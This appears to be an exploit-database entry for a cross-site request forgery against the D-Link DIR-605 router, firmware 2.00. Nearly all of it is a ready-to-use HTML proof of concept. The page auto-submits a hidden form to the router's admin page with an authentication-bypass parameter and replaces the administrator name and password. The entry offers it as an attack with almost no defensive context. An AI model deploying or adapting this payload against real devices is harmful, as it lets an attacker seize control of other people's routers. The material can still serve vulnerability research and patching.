[] NeoSense
E X P L O I T S
title author type platform port cve id

D-Link DIR-605 - Cross-Site Request Forgery

Author: iqzer0
type: webapps
platform: hardware
port: 
date_added: 2012-03-21 
date_updated: 2012-03-21 
verified: 0 
codes: OSVDB-80549 
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: D-Link DIR-605 CSRF Vulnerability
# Date: 20-03-2012
# Author: iqzer0++
# Version: Firmware Version : 2.00
# Tested on: DIR-605

This allows unauthroized access to the device and post injections

<html>
<form name="bypass" action="
http://xxx.xxx.xxx.xxx/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0"
method="post">
       <input type="hidden" name="ACTION_POST" value="1" />
        <input type="hidden" name="admin_name" value="iqzer0" />
        <input type="hidden" name="admin_password1" value="bypass" />
        <input type="hidden" name="admin_password2" value="bypass" />
</form>
<script>document.bypass.submit();</script>
</html>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.